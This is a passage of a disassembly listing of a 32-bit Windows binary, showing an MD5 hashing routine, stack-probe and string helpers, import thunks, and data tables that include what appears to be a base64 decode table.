loop loc_422A38
locret_422A44: ; CODE XREF: sub_422A0D+14�j
retn
sub_422A0D endp
; =============== S U B R O U T I N E =======================================
sub_422A45 proc near ; CODE XREF: sub_422A96+32�p
; sub_422A96+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_422A45 endp
; =============== S U B R O U T I N E =======================================
sub_422A52 proc near ; CODE XREF: sub_422A96+219�p
; sub_422A96+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_422A52 endp
; =============== S U B R O U T I N E =======================================
sub_422A5F proc near ; CODE XREF: sub_422A96+420�p
; sub_422A96+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_422A5F endp
; =============== S U B R O U T I N E =======================================
sub_422A66 proc near ; CODE XREF: sub_422A96+627�p
; sub_422A96+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_422A66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422A6F proc near ; CODE XREF: sub_41C6CD+73�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_422A6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422A96 proc near ; CODE XREF: sub_41C6CD+8B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov ds:10014B68h, eax
mov eax, [edi+4]
mov ds:10014B6Ch, eax
mov eax, [edi+8]
mov ds:10014B70h, eax
mov eax, [edi+0Ch]
mov ds:10014B74h, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A45
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A45
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A45
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A45
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A45
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A45
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A45
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A45
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A45
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A45
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A45
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A45
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A45
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A45
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A45
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A52
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A52
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A52
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A52
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A52
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A52
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A52
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A52
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A52
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A52
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A52
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A52
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A52
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A52
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A52
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A52
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A5F
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A5F
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A5F
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A5F
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A5F
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A5F
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A5F
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A5F
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A5F
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A5F
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A5F
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A5F
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A5F
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A5F
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A5F
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A5F
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A66
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A66
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A66
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A66
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A66
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A66
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A66
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A66
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A66
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A66
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A66
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A66
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_422A66
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_422A66
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_422A66
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_422A66
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, ds:10014B68h
add [edi], eax
mov eax, ds:10014B6Ch
add [edi+4], eax
mov eax, ds:10014B70h
add [edi+8], eax
mov eax, ds:10014B74h
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_422A96 endp
; =============== S U B R O U T I N E =======================================
sub_4232E1 proc near ; CODE XREF: sub_4232FE+1E�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_4232E2: ; CODE XREF: sub_4232E1+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_4232E2
sub esp, eax
test [esp+0FFCh+var_FFC], eax
push ecx
retn
sub_4232E1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4232FE proc near ; CODE XREF: sub_41D465+42�p
arg_0 = dword ptr 4
pop ecx
pop eax
add eax, 3
shr eax, 2
shl eax, 2
cmp eax, 1000h
jl short loc_42332E
mov edx, esp
push eax
fild [esp-4+arg_0]
mov [esp-4+arg_0], ecx
fild [esp-4+arg_0]
call sub_4232E1
mov esp, edx
push edx
fistp dword ptr [esp+0]
mov ecx, [esp+0]
fistp dword ptr [esp+0]
pop eax
loc_42332E: ; CODE XREF: sub_4232FE+10�j
sub esp, eax
mov eax, esp
mov dword ptr [eax], 0
push ecx
push ecx
retn
sub_4232FE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 40C03100h, 0CC2h, 3CD95000h, 24048B24h, 2434BA0Fh, 0C816608h
db 24h, 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423368
loc_423357: ; CODE XREF: sub_423368+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_423368
; ---------------------------------------------------------------------------
db 50h, 0D9h, 3Ch
dd 0F3EB5824h
; =============== S U B R O U T I N E =======================================
sub_423368 proc near ; CODE XREF: .data:loc_4185B4�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423357 SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_423357
sub_423368 endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_423379 proc near ; CODE XREF: sub_418999+8�p
; sub_4197BE+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_42337A: ; CODE XREF: sub_423379+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_42337A
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_423379 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_423399 proc near ; CODE XREF: sub_418999+243�p
; sub_418999+5A7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_423399 endp
; ---------------------------------------------------------------------------
align 4
dd 0AC25FF00h, 90100150h, 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4233D1 proc near ; CODE XREF: sub_418669+10�p
jmp dword ptr ds:100150B0h
sub_4233D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4233DD proc near ; CODE XREF: sub_41848D+13�p
jmp dword ptr ds:100150B4h
sub_4233DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4233E9 proc near ; CODE XREF: sub_4185D0+33�p
; sub_4185D0+45�p ...
jmp dword ptr ds:100150C0h
sub_4233E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4233F5 proc near ; CODE XREF: sub_4185D0+B�p
; sub_4185D0+17�p ...
jmp dword ptr ds:100150C4h
sub_4233F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 0C825FF00h, 90100150h, 90h, 0CC25FF00h, 90100150h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_423419 proc near ; CODE XREF: sub_418669+4E�p
; sub_418669+87�p
jmp dword ptr ds:100150D0h
sub_423419 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_423425 proc near ; CODE XREF: .data:00418593�p
jmp dword ptr ds:100150D4h
sub_423425 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_423431 proc near ; CODE XREF: sub_4185D0+71�p
; sub_4185D0+86�p
jmp dword ptr ds:100150D8h
sub_423431 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42343D proc near ; CODE XREF: sub_418669+9E�p
jmp dword ptr ds:100150DCh
sub_42343D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 71h dup(0)
dd 0BF3000h, 10h, 4 dup(0)
dd 732500h, 72007700h, 1Ch dup(0)
dd 300h, 600h, 200h, 500h, 400h, 2 dup(600h), 100h, 700h
dd 800h, 300h, 900h, 200h, 700h, 0
dd 2 dup(700h), 600h, 200h, 300h, 100h, 900h, 100h, 400h
dd 100h, 2 dup(700h), 600h, 300h, 800h, 2 dup(600h), 500h
dd 800h, 300h, 2 dup(500h), 600h, 900h, 800h, 300h, 800h
dd 0
dd 300h, 900h, 600h, 200h, 600h, 800h, 700h, 2 dup(900h)
dd 100h, 400h, 0
dd 100h, 200h, 700h, 400h, 500h, 400h, 200h, 2 dup(0)
dd 200h, 900h, 200h, 600h, 300h, 700h, 200h, 500h, 700h
dd 400h, 500h, 900h, 400h, 500h, 0
dd 600h, 700h, 200h, 900h, 100h, 300h, 400h, 100h, 800h
dd 300h, 400h, 300h, 2 dup(500h), 100h, 500h, 600h, 100h
dd 900h, 500h, 800h, 400h, 500h, 300h, 700h, 600h, 400h
dd 0
dd 500h, 200h, 400h, 0
dd 900h, 100h, 900h, 200h, 800h, 200h, 900h, 400h, 900h
dd 400h, 100h, 200h, 2 dup(400h), 900h, 2 dup(600h), 0Bh dup(0)
dd 149B200h, 0E86010h, 61000000h, 0E9h, 0
dd 1100h, 0Fh dup(0)
db 0
db 0A5h, 0EEh, 0F7h
db 0E1h ;
db 2Ch, 7Eh, 0FDh
db 0BFh ;
db 7Fh, 0E8h, 9Ah
db 86h ;
db 82h, 40h, 24h
db 0CCh ;
db 0E2h, 0DDh, 6Ah
db 0D7h ;
db 2 dup(0E1h), 77h
db 1Bh
db 0B0h, 15h, 52h
db 50h ; P
db 56h, 64h, 4Bh
db 0D2h ;
db 6Bh, 7Ch, 35h
db 3Dh ; =
db 0D5h, 85h, 0Eh
db 28h ; (
db 0F9h, 51h, 0B0h
db 1Ah
db 44h, 87h, 4Eh
db 1Eh
db 0DFh, 0CCh, 83h
db 0E3h ;
db 37h, 47h, 3Dh
db 32h ; 2
db 18h, 5, 0F8h
db 14h
db 0BFh, 37h, 6
db 6Eh ; n
align 10h
db 0
db 0D0h, 9Ch, 0
db 10h
db 4Bh, 7Fh, 0
db 10h
db 0BFh, 7Bh, 0
db 10h
db 0A7h, 51h, 0
db 10h
db 0EEh, 89h, 0
db 10h
db 94h, 92h, 0
db 10h
db 89h, 5Eh, 0
db 10h
align 10h
db 0
db 0B8h, 25h, 0
db 10h
db 0A1h, 25h, 0
db 10h
db 0C1h, 9Eh, 0
db 10h
db 7Fh, 5Ch, 0
db 10h
db 0BCh, 2Dh, 0
db 10h
db 6Bh, 50h, 0
db 10h
db 0E8h, 9Eh, 0
db 10h
db 74h, 33h, 1
db 10h
align 4
db 0
db 8Ch, 54h, 0
db 10h
db 0AFh, 51h, 0
db 10h
db 60h, 5Eh, 0
db 10h
db 43h, 7Fh, 0
db 10h
db 1Ah, 46h, 0
db 10h
db 33h, 26h, 0
db 10h
db 57h, 28h, 0
db 10h
db 98h, 33h, 1
db 10h
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3Eh, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3Fh, 2 dup(0)
db 0
db 34h, 2 dup(0)
db 0
db 35h, 2 dup(0)
db 0
db 36h, 2 dup(0)
db 0
db 37h, 2 dup(0)
db 0
db 38h, 2 dup(0)
db 0
db 39h, 2 dup(0)
db 0
db 3Ah, 2 dup(0)
db 0
db 3Bh, 2 dup(0)
db 0
db 3Ch, 2 dup(0)
db 0
db 3Dh, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
align 4
db 0
db 1, 2 dup(0)
db 0
db 2, 2 dup(0)
db 0
db 3, 2 dup(0)
db 0
db 4, 2 dup(0)
db 0
db 5, 2 dup(0)
db 0
db 6, 2 dup(0)
db 0
db 7, 2 dup(0)
db 0
db 8, 2 dup(0)
db 0
db 9, 2 dup(0)
db 0
db 0Ah, 2 dup(0)
db 0
db 0Bh, 2 dup(0)
db 0
db 0Ch, 2 dup(0)
db 0
db 0Dh, 2 dup(0)
db 0
db 0Eh, 2 dup(0)
db 0
db 0Fh, 2 dup(0)
db 0
db 10h, 2 dup(0)
db 0
db 11h, 2 dup(0)
db 0
db 12h, 2 dup(0)
db 0
db 13h, 2 dup(0)
db 0
db 14h, 2 dup(0)
db 0
db 15h, 2 dup(0)
db 0
db 16h, 2 dup(0)
db 0
db 17h, 2 dup(0)
db 0
db 18h, 2 dup(0)
db 0
db 19h, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 1Ah, 2 dup(0)
db 0
db 1Bh, 2 dup(0)
db 0
db 1Ch, 2 dup(0)
db 0
db 1Dh, 2 dup(0)
db 0
db 1Eh, 2 dup(0)
db 0
db 1Fh, 2 dup(0)
db 0
db 20h, 2 dup(0)
db 0
db 21h, 2 dup(0)
db 0
db 22h, 2 dup(0)
db 0
db 23h, 2 dup(0)
db 0
db 24h, 2 dup(0)
db 0
db 25h, 2 dup(0)
db 0
db 26h, 2 dup(0)
db 0
db 27h, 2 dup(0)
db 0
db 28h, 2 dup(0)
db 0
db 29h, 2 dup(0)
db 0
db 2Ah, 2 dup(0)
db 0
db 2Bh, 2 dup(0)
db 0
db 2Ch, 2 dup(0)
db 0
db 2Dh, 2 dup(0)
db 0
db 2Eh, 2 dup(0)
db 0
db 2Fh, 2 dup(0)
db 0
db 30h, 2 dup(0)
db 0
db 31h, 2 dup(0)
db 0
db 32h, 2 dup(0)
db 0
db 33h, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
